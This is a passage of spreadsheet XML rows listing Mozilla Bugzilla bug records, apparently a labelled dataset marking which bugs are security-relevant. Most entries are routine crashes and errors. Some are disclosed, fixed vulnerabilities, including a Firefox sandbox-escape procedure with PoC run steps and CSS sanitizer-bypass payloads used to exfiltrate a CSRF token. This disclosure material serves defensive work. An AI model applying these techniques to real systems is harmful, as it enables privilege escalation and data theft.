    #34 0x48d557 in content_process_main(int, char**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/app/../contentproc/plugin-container.cpp:224
    #35 0x7f4e95a9182f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #36 0x48c49c in _start (/home/nils/fuzzer3/firefox/plugin-container+0x48c49c)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /builds/slave/m-cen-l64-asan-000000000000000/build/src/accessible/generic/HyperTextAccessible.cpp:2035 mozilla::a11y::HyperTextAccessible::GetChildOffset(unsigned int, bool) const
==21316==ABORTING</t>
        </is>
      </c>
      <c r="X311" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="312">
      <c r="A312" t="n">
        <v>72676</v>
      </c>
      <c r="B312" t="inlineStr">
        <is>
          <t>2001-03-20 11:28:17 -0800</t>
        </is>
      </c>
      <c r="C312" t="inlineStr">
        <is>
          <t>crash if right click with mouse inside movie</t>
        </is>
      </c>
      <c r="D312" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E312" t="n">
        <v>1</v>
      </c>
      <c r="F312" t="n">
        <v>1</v>
      </c>
      <c r="G312" t="n">
        <v>6</v>
      </c>
      <c r="H312" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I312" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J312" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K312" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L312" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M312" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N312" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O312" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P312" t="inlineStr"/>
      <c r="Q312" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R312" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S312" t="inlineStr">
        <is>
          <t>mozilla0.9</t>
        </is>
      </c>
      <c r="T312" t="n">
        <v>1</v>
      </c>
      <c r="U312" t="n">
        <v>0</v>
      </c>
      <c r="V312" t="n">
        <v>12</v>
      </c>
      <c r="W312" t="inlineStr">
        <is>
          <t>windows trunk 0320
steps:
go to the url above
right click inside the movie clip
observe that the browser just closes..no talkback agent...</t>
        </is>
      </c>
      <c r="X312" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="313">
      <c r="A313" t="n">
        <v>234058</v>
      </c>
      <c r="B313" t="inlineStr">
        <is>
          <t>2004-02-12 11:15:59 -0800</t>
        </is>
      </c>
      <c r="C313" t="inlineStr">
        <is>
          <t>Certificate name matching for non-FQDNs is insecure</t>
        </is>
      </c>
      <c r="D313" t="inlineStr">
        <is>
          <t>2004-08-03 00:53:16 -0700</t>
        </is>
      </c>
      <c r="E313" t="n">
        <v>1</v>
      </c>
      <c r="F313" t="n">
        <v>1</v>
      </c>
      <c r="G313" t="n">
        <v>3</v>
      </c>
      <c r="H313" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I313" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J313" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K313" t="inlineStr">
        <is>
          <t>3.9</t>
        </is>
      </c>
      <c r="L313" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M313" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N313" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O313" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P313" t="inlineStr">
        <is>
          <t>[sg:fix] fixed in NSS 3.10 and 3.9.2,fixed-aviary1.0</t>
        </is>
      </c>
      <c r="Q313" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R313" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S313" t="inlineStr">
        <is>
          <t>3.9.2</t>
        </is>
      </c>
      <c r="T313" t="n">
        <v>1</v>
      </c>
      <c r="U313" t="n">
        <v>0</v>
      </c>
      <c r="V313" t="n">
        <v>41</v>
      </c>
      <c r="W313" t="inlineStr">
        <is>
          <t>User-Agent:       
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.5) Gecko/20031007 Firebird/0.7
We were wondering why we don't get cert warnings when going to a site with a
cert for
'blahblah.internal.company.com' with a URL of the form: http://blahblah/file.html :
A colleague found the code:
&gt; Looks like some shadiness in mozilla/security/nss/lib/certdb/certdb.c,
&gt; specifically in cert_TestHostName (hn is the host, cn is the common
&gt; name in the cert):
&gt;
&gt; ------------------
&gt;     if ((hndomain = PORT_Strchr(hn, '.')) == NULL) {
&gt;         /* No domain in URI host name */
&gt;         char * cndomain;
&gt;         if ((cndomain = PORT_Strchr(cn, '.')) != NULL &amp;&amp;
&gt;             (cndomain - cn) &gt; 0) {
&gt;             /* there is a domain in the cn string, so chop it off */
&gt;             *cndomain = '\0';
&gt;         }
&gt;     }
&gt; ------------------
&gt;
&gt; If the URI in the browser isn't fully qualified, it just checks it
&gt; against the first part of the common name. Seems like this is
&gt; intentional, which is weird.
This is a security vulnerability.
An attacker could get a cert issued by Verisign for www.badguys.com and
impersonate www.internal.company.com , assuming some users at company.com have
internal.company.com set as their default search domain and access their site
using the short name 'www'.
IMHO, the right way to do it would to expand the short name being accessed into
a FQDN and compare them. I don't have any idea how to do this in practice; it
might require a browser setting. Unfortunately, my first idea, resolving the
name from the cert and comparing IP addresses, is also insecure: it would just
require the attacker to modify their own DNS record for www.badguys.com to point
to the same ip address as www.internal.company.com.
This bug makes SSL security dependent on DNS security (which is bad).
However, being able to support the desired behavior is good: it's nice for
people to be able to use unqualified names, and the security infrastructure can
(and should) support them. It would be nice if NSS, rather than trimming the
qualification from the CN, added candidate qualifications to the non-qualified
host name until it got a match or ran out of candidates. The hard part is where
to get the candidate qualifications from.
Reproducible: Always
Steps to Reproduce:</t>
        </is>
      </c>
      <c r="X313" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="314">
      <c r="A314" t="n">
        <v>1618911</v>
      </c>
      <c r="B314" t="inlineStr">
        <is>
          <t>2020-02-28 08:41:07 -0800</t>
        </is>
      </c>
      <c r="C314" t="inlineStr">
        <is>
          <t>Firefox: Default Content Process DACL Sandbox Escape</t>
        </is>
      </c>
      <c r="D314" t="inlineStr">
        <is>
          <t>2021-10-20 13:30:49 -0700</t>
        </is>
      </c>
      <c r="E314" t="n">
        <v>1</v>
      </c>
      <c r="F314" t="n">
        <v>1</v>
      </c>
      <c r="G314" t="n">
        <v>3</v>
      </c>
      <c r="H314" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I314" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J314" t="inlineStr">
        <is>
          <t>Security: Process Sandboxing</t>
        </is>
      </c>
      <c r="K314" t="inlineStr">
        <is>
          <t>75 Branch</t>
        </is>
      </c>
      <c r="L314" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M314" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N314" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O314" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P314" t="inlineStr">
        <is>
          <t>[disclosure date is 2020-05-28][post-critsmash-triage][adv-main76+][adv-ESR68.8+]</t>
        </is>
      </c>
      <c r="Q314" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R314" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S314" t="inlineStr">
        <is>
          <t>mozilla76</t>
        </is>
      </c>
      <c r="T314" t="n">
        <v>1</v>
      </c>
      <c r="U314" t="n">
        <v>0</v>
      </c>
      <c r="V314" t="n">
        <v>53</v>
      </c>
      <c r="W314" t="inlineStr">
        <is>
          <t>Created attachment 9129793
Proof of Concept Visual Studio Project
Firefox: Default Content Process DACL Sandbox Escape
Platform: Firefox 73.0.1 and 75.0a1, 64-bit on Windows 10 1809/1909 (not tested earlier OS versions).
Class: Elevation of Privilege
Summary: The Firefox content processes do not sufficiently lockdown access control which can result in a sandbox escape.
Description:
According to https://wiki.mozilla.org/Security/Sandbox the current content process sandbox is Level 5 which runs with Chromium token level of USER_LIMITED. However, USER_LIMITED is sufficient to open any of the other content processes running at the same time.
The ability to open another process presents a problem, the initial token is set to USER_RESTRICTED_SAME_ACCESS. If a content process is compromised via an RCE then an attack waits for a new content process to be created (there’s also likely a way of making a new content process start programmatically) the process can be opened before the initial thread token is dropped with the call to LowerToken and the attack can run as USER_RESTRICTED_SAME_ACCESS. 
Even though the content process runs as a Low Integrity Level this access is sufficient to escape the sandbox. There’s likely to be multiple routes to escape but one which works that I’ve provided as a POC is as follows:
1. Wait for a new content process to start. Immediately suspend the process.
2. Impersonate the main thread’s initial token to elevate privileges.
3. Create an out-of-process COM server using the privileged identity to escape the process Job object. This also bypasses the child process mitigation as that’s set on the primary token, not the impersonation token.
4. Migrate to the new COM server process, abuse a UAC “feature” documented at https://www.tiraniddo.dev/2019/02/accessing-access-tokens-for-uiaccess.html which allows us to create a new process with UI Access privilege under our control.
5. Use UI Access to bypass UIPI and programmatically access the Explorer Run Dialog to spawn a process outside of the sandbox.
Fixing wise, you should be able to call the Chromium sandbox target policy function SetLockdownDefaultDacl to restrict the access between content processes. Note that it’s possible this will cause some system code to fail, you’ll need to do extensive testing to make sure it’s not a problem. 
On a related topic I’d also recommend calling:
sandbox::ApplyProcessMitigationsToCurrentProcess(sandbox::MITIGATION_HARDEN_TOKEN_IL_POLICY).
In the main browser process. This prevents related token stealing attacks, which while mostly mitigated in Windows could still pose a risk. This can be done in slow time, it doesn’t have to be part of this fix.
Proof of Concept:
I’ve provided a PoC as a Visual Studio 2019 project. It contains a C# DLL injector and a C++ DLL which will be injected into a running copy of Firefox. The exploit will send details to the debug output which you can capture using Sysinternals Debug View.
Note, I’ve tested this on the latest stable as well as Nightly. It seems at least in Nightly it hits a release assert at https://dxr.mozilla.org/mozilla-central/source/ipc/glue/Transport_win.h#68 if debugging, continuing the execution the exploit still works. I think this assert is probably due to the process suspension, though it’s not entirely clear. I’m of the opinion that it doesn’t block the exploit, and is not really related.
1) Compile the VS2019 solution project as Release build, x64. The C# It will need to grab the NtApiDotNet library from NuGet to work.
2) Copy the DLL from x64\Release and InjectDll.exe and NtApiDotNet.dll from InjectDll\bin\Release to a generally accessible directory (say C:\Test).
3) Start a copy of Firefox running.
4) From a command line run InjectDll.exe FirefoxSandboxEscape.dll. Check that prints a PID, this is the process the code has injected into which should be a sandboxed content process.
5) In firefox create a new tab and navigate to a new web page. This should cause a new content process to be created for the exploit to hijack. A command prompt running at medium should appear.
Expected Result:
Code running in one content process should not be able to open other content processes.
Observed Result:
Content process is opened, initial thread token repurposes and sandbox escaped.
This bug is subject to a 90 day disclosure deadline. After 90 days elapse,
the bug report will become visible to the public. The scheduled disclosure
date is 2020-05-28. Disclosure at an earlier date is also possible if
agreed upon by all parties.</t>
        </is>
      </c>
      <c r="X314" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="315">
      <c r="A315" t="n">
        <v>1598485</v>
      </c>
      <c r="B315" t="inlineStr">
        <is>
          <t>2019-11-21 15:21:40 -0800</t>
        </is>
      </c>
      <c r="C315" t="inlineStr">
        <is>
          <t>NSS Phabricator Coverity not running</t>
        </is>
      </c>
      <c r="D315" t="inlineStr">
        <is>
          <t>2022-08-17 14:01:35 -0700</t>
        </is>
      </c>
      <c r="E315" t="n">
        <v>1</v>
      </c>
      <c r="F315" t="n">
        <v>1</v>
      </c>
      <c r="G315" t="n">
        <v>7</v>
      </c>
      <c r="H315" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I315" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J315" t="inlineStr">
        <is>
          <t>Source Code Analysis</t>
        </is>
      </c>
      <c r="K315" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L315" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M315" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N315" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O315" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P315" t="inlineStr"/>
      <c r="Q315" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R315" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S315" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T315" t="n">
        <v>1</v>
      </c>
      <c r="U315" t="n">
        <v>0</v>
      </c>
      <c r="V315" t="n">
        <v>9</v>
      </c>
      <c r="W315" t="inlineStr">
        <is>
          <t>https://phabricator.services.mozilla.com/D53032 had a coverity defect which wasn't caught on Phabricator (see https://bugzilla.mozilla.org/show_bug.cgi?id=1596450#c3). It appears the recent Taskcluster migration of NSS (Bug 1594891 ) must have broken our Coverity integration.</t>
        </is>
      </c>
      <c r="X315" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="316">
      <c r="A316" t="n">
        <v>2388</v>
      </c>
      <c r="B316" t="inlineStr">
        <is>
          <t>1999-01-14 15:59:25 -0800</t>
        </is>
      </c>
      <c r="C316" t="inlineStr">
        <is>
          <t>[PP]http://www.whowhere.com: Page does not load</t>
        </is>
      </c>
      <c r="D316" t="inlineStr">
        <is>
          <t>1999-12-13 16:36:38 -0800</t>
        </is>
      </c>
      <c r="E316" t="n">
        <v>1</v>
      </c>
      <c r="F316" t="n">
        <v>1</v>
      </c>
      <c r="G316" t="n">
        <v>3</v>
      </c>
      <c r="H316" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I316" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J316" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K316" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L316" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M316" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N316" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O316" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P316" t="inlineStr"/>
      <c r="Q316" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R316" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S316" t="inlineStr">
        <is>
          <t>M2</t>
        </is>
      </c>
      <c r="T316" t="n">
        <v>1</v>
      </c>
      <c r="U316" t="n">
        <v>0</v>
      </c>
      <c r="V316" t="n">
        <v>11</v>
      </c>
      <c r="W316" t="inlineStr">
        <is>
          <t>Using 1/14 build on Win 98.
Bring up URL.
Page does not load.</t>
        </is>
      </c>
      <c r="X316" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="317">
      <c r="A317" t="n">
        <v>474536</v>
      </c>
      <c r="B317" t="inlineStr">
        <is>
          <t>2009-01-20 19:58:48 -0800</t>
        </is>
      </c>
      <c r="C317" t="inlineStr">
        <is>
          <t>The jar: scheme ignores the content-disposition: header on the inner URI</t>
        </is>
      </c>
      <c r="D317" t="inlineStr">
        <is>
          <t>2012-10-26 11:06:52 -0700</t>
        </is>
      </c>
      <c r="E317" t="n">
        <v>1</v>
      </c>
      <c r="F317" t="n">
        <v>1</v>
      </c>
      <c r="G317" t="n">
        <v>3</v>
      </c>
      <c r="H317" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I317" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J317" t="inlineStr">
        <is>
          <t>Networking: JAR</t>
        </is>
      </c>
      <c r="K317" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L317" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M317" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N317" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O317" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P317" t="inlineStr">
        <is>
          <t>[sg:moderate] XSS against sites who use this header for security reasons</t>
        </is>
      </c>
      <c r="Q317" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R317" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S317" t="inlineStr">
        <is>
          <t>mozilla1.9.1</t>
        </is>
      </c>
      <c r="T317" t="n">
        <v>1</v>
      </c>
      <c r="U317" t="n">
        <v>0</v>
      </c>
      <c r="V317" t="n">
        <v>50</v>
      </c>
      <c r="W317" t="inlineStr">
        <is>
          <t>When the jar: scheme wraps a URI that returns a Content-disposition: attachment header that will be ignored and the inner zip file unpacked and the specified file interpreted anyway. Since Content-disposition: attachment is often used to prevent potentially dangerous or unknown content from being interpreted by browsers as part of the serving host's domain this can lead to security issues as in bug 472206 comment 27</t>
        </is>
      </c>
      <c r="X317" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="318">
      <c r="A318" t="n">
        <v>1599181</v>
      </c>
      <c r="B318" t="inlineStr">
        <is>
          <t>2019-11-25 10:23:26 -0800</t>
        </is>
      </c>
      <c r="C318" t="inlineStr">
        <is>
          <t>Bypass of CSS Sanitizer via incorrect serialization of CSS @namespace rule.</t>
        </is>
      </c>
      <c r="D318" t="inlineStr">
        <is>
          <t>2024-05-30 10:04:58 -0700</t>
        </is>
      </c>
      <c r="E318" t="n">
        <v>1</v>
      </c>
      <c r="F318" t="n">
        <v>1</v>
      </c>
      <c r="G318" t="n">
        <v>3</v>
      </c>
      <c r="H318" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I318" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J318" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K318" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L318" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M318" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N318" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O318" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P318" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [post-critsmash-triage][adv-main72+][adv-esr68.4+]</t>
        </is>
      </c>
      <c r="Q318" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R318" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S318" t="inlineStr">
        <is>
          <t>mozilla73</t>
        </is>
      </c>
      <c r="T318" t="n">
        <v>1</v>
      </c>
      <c r="U318" t="n">
        <v>0</v>
      </c>
      <c r="V318" t="n">
        <v>26</v>
      </c>
      <c r="W318" t="inlineStr">
        <is>
          <t>I've been recently researching the security of copy&amp;paste in various browsers and noticed that Firefox perform CSS sanitization on &lt;style&gt; tags pasted from clipboard. The sanitizer could be abused in such a way that arbitrary CSS rules might be specified, allowing to data exfiltration attack.
In a nutshell, a &lt;style&gt; tag is pasted verbatim if the sanitizer decides that it doesn't contain any harmful content. Otherwise it rewrites the stylesheet, and gets rid of certain rules. Please follow the examples below to see how I came up with the exploit:
Example 1
INPUT: *{background:red}
SANITIZED OUTPUT: *{background:red}
COMMENT: The style is copied verbatim as it doesn't have any malicious rules.
Example 2:
INPUT: @import 'abc';*{background:red}
SANITIZED OUTPUT: * { background: red none repeat scroll 0% 0%; }
COMMENT: @import at-rule is disallowed, hence the CSS was rewritten.
Example 3
INPUT: @import'abc';@namespace x 'aa';*{background:#eee}
SANITIZED OUTPUT: @namespace x url("aa");* { background: rgb(238, 238, 238) none repeat scroll 0% 0%; }
COMMENT: @namespace at-rule, on the other hand, is allowed. The URL of the namespace was rewritten from '...' syntax to url("...") syntax. At this point I had an idea that perhaps a quote character within the URL wouldn't be escaped when rewritten to the url("...") syntax.
Example 4
INPUT: @import'abc';@namespace x 'a"bc';*{background:#eee}
SANITIZED OUTPUT: @namespace x url("a"bc");* { background: rgb(238, 238, 238) none repeat scroll 0% 0%; }
COMMENT: Please note the unescaped quote in the namespace URL. This means that arbitrary CSS rules can be injected - even @import!
Example 5
INPUT: @import'abc';@namespace x 'a"x);@import "data:text/css,*{background:blue}";';
SANITIZED OUTPUT: @namespace x url("a"x);@import "data:text/css,*{background:blue}";");
COMMENT: I'm injecting @import at-rule with data: URI to prove the vulnerability. At first sight it may appear as if the @import wouldn't execute since it follows @namespace which is disallowed. However, @namespace currently has an incorrect syntax (there's an "x" character right after closing quote), and is ignored by the CSS parser (as it was never there). @import is then treated as first valid rule of the CSS.
Example 6
INPUT: @import'abc';*{background: url('aaa"bbb')}
SANITIZED OUTPUT: * { background: rgba(0, 0, 0, 0) url("aaa\"bbb") repeat scroll 0% 0%; }
COMMENT: Interestingly, the same problem doesn't happen in other contexts where rules are rewritten. This example shows that the URL of background is rewritten with proper escaping.
To summarize: because of improper rewriting of @namespace rule, it's possible to inject arbitrary CSS style.
PROOF OF CONCEPT:
I have prepared a PoC which exfiltrates CSS token from a hidden input using this very technique. The scenario is that the page contains a rich editor (i.e. a contenteditable element on the page) and the user just pastes the malicious content from clipboard. Because of some quirks in implementation of the attack, it requires HTTP/2, so it's first needed to create self-signed certificates:
1. Save css-exfiltration-firefox.js and vulnerable-page.html to some directory
2. openssl req -x509 -newkey rsa:2048 -nodes -sha256 -subj '/CN=localhost'  -keyout localhost-privkey.pem -out localhost-cert.pem
3. npm install express spdy
4. node css-exfiltration-firefox.js
5. Open Firefox and navigate to both https://localhost:3000 and https://127.0.0.1:3000 and trust the certificate.
6. Go to https://localhost:3000 and press "Copy".
7. Go to vulnerable page and paste it in the contenteditable box.
8. See how the CSRF token is exfiltrated :)
I will also attach the video of the attack.</t>
        </is>
      </c>
      <c r="X318" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="319">
      <c r="A319" t="n">
        <v>187861</v>
      </c>
      <c r="B319" t="inlineStr">
        <is>
          <t>2003-01-05 21:03:48 -0800</t>
        </is>
      </c>
      <c r="C319" t="inlineStr">
        <is>
          <t>Bugzilla::CGI dies when calling processmail after creating an attachment</t>
        </is>
      </c>
      <c r="D319" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:34 -0800</t>
        </is>
      </c>
      <c r="E319" t="n">
        <v>1</v>
      </c>
      <c r="F319" t="n">
        <v>1</v>
      </c>
      <c r="G319" t="n">
        <v>4</v>
      </c>
      <c r="H319" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I319" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J319" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K319" t="inlineStr">
        <is>
          <t>2.17.2</t>
        </is>
      </c>
      <c r="L319" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M319" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N319" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O319" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P319" t="inlineStr"/>
      <c r="Q319" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R319" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S319" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T319" t="n">
        <v>1</v>
      </c>
      <c r="U319" t="n">
        <v>0</v>
      </c>
      <c r="V319" t="n">
        <v>13</v>
      </c>
      <c r="W319" t="inlineStr">
        <is>
          <t>Undefined subroutine &amp;main::ThrowCodeError called at Bugzilla/CGI.pm line 78.
        main::die_with_dignity('Undefined subroutine &amp;main::ThrowCodeError
called at Bugzilla/CG...') called at Bugzilla/CGI.pm line 78
        Bugzilla::CGI::new('Bugzilla::CGI') called at Bugzilla.pm line 81
        Bugzilla::_init_transient('Bugzilla=HASH(0x832356c)') called at
Bugzilla.pm line 35
        Bugzilla::create('Bugzilla') called at globals.pl line 1702
        require globals.pl called at ./processmail line 31
Compilation failed in require at ./processmail line 31.
        main::die_with_dignity('Undefined subroutine &amp;main::ThrowCodeError
called at Bugzilla/CG...') called at ./processmail line 31
This shows up visually to the user as "Status: 400 Bad Request (invalid
multi-part post)" in the spot where the output from processmail normally goes
when responding to a posted attachment.
The fundamental problem here appears to be that Bugzilla.pm is creating a
Bugzilla::CGI object when it's not called from a CGI environment (processmail is
a separate program).  Unfortunately, all the environment variables are still
hanging around and there's nothing left on standard input to parse, so it
totally dies.
Although I believe the symptoms of this will be fixed by moving processmail to a
module (which is another bug, and almost ready for checkin I believe), the core
problem of automatically creating a CGI object from Bugzilla.pm should probably
be dealt with because Bugzilla.pm should really be loadable from any program
wishing to access Bugzilla, whether it's CGI or not, and trying to load CGI when
you're not in a CGI environment isn't always pretty, as demonstrated here.</t>
        </is>
      </c>
      <c r="X319" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="320">
      <c r="A320" t="n">
        <v>1690976</v>
      </c>
      <c r="B320" t="inlineStr">
        <is>
          <t>2021-02-04 23:56:43 -0800</t>
        </is>
      </c>
      <c r="C320" t="inlineStr">
        <is>
          <t>MediaError message property can leak information about cross-origin media resource</t>
        </is>
      </c>
      <c r="D320" t="inlineStr">
        <is>
          <t>2021-11-22 23:34:20 -0800</t>
        </is>
      </c>
      <c r="E320" t="n">
        <v>1</v>
      </c>
      <c r="F320" t="n">
        <v>1</v>
      </c>
      <c r="G320" t="n">
        <v>3</v>
      </c>
      <c r="H320" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I320" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J320" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K320" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L320" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M320" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N320" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O320" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P320" t="inlineStr">
        <is>
          <t>[adv-main86+][adv-esr78.8+]</t>
        </is>
      </c>
      <c r="Q320" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R320" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S320" t="inlineStr">
        <is>
          <t>87 Branch</t>
        </is>
      </c>
      <c r="T320" t="n">
        <v>1</v>
      </c>
      <c r="U320" t="n">
        <v>0</v>
      </c>
      <c r="V320" t="n">
        <v>11</v>
      </c>
      <c r="W320" t="inlineStr">
        <is>
          <t>Similarly to bug 1450853, but while decoding instead of loading -- and setting the error through [this](https://searchfox.org/mozilla-central/rev/40205f1b55f1ba8a26fcbd362c20d843e8718a87/dom/html/HTMLMediaElement.cpp#5409) path. I don't think this could leak any response status, but it can leak information about the content of the media resource. Things like [this](https://searchfox.org/mozilla-central/rev/40205f1b55f1ba8a26fcbd362c20d843e8718a87/dom/media/platforms/agnostic/OpusDecoder.cpp#255) or [this](https://searchfox.org/mozilla-central/rev/40205f1b55f1ba8a26fcbd362c20d843e8718a87/dom/media/platforms/agnostic/VPXDecoder.cpp#124-125).
+++ This bug was initially created as a clone of Bug #1450853 +++
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
Build ID: 20180208173149
Steps to reproduce:
1- Visit: https://output.jsbin.com/nejatopusi
2- Enter a URL in the input box, click the "Test" button
The URL will be loaded as the `src` of an audio element.
Actual results:
The message property of the MediaError interface contains a different string for resources that loads successfully. This allows an attacker to infer the response status for a cross-origin resource.
Expected results:
Cross-origin response status should not be detectable by scripts unless necessary CORS headers are sent by the server.</t>
        </is>
      </c>
      <c r="X320" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="321">
      <c r="A321" t="n">
        <v>1361890</v>
      </c>
      <c r="B321" t="inlineStr">
        <is>
          <t>2017-05-03 16:37:42 -0700</t>
        </is>
      </c>
      <c r="C321" t="inlineStr">
        <is>
          <t>Remove asset concatenation</t>
        </is>
      </c>
      <c r="D321" t="inlineStr">
        <is>
          <t>2017-12-20 10:35:51 -0800</t>
        </is>
      </c>
      <c r="E321" t="n">
        <v>1</v>
      </c>
      <c r="F321" t="n">
        <v>1</v>
      </c>
      <c r="G321" t="n">
        <v>7</v>
      </c>
      <c r="H321" t="inlineStr">
        <is>
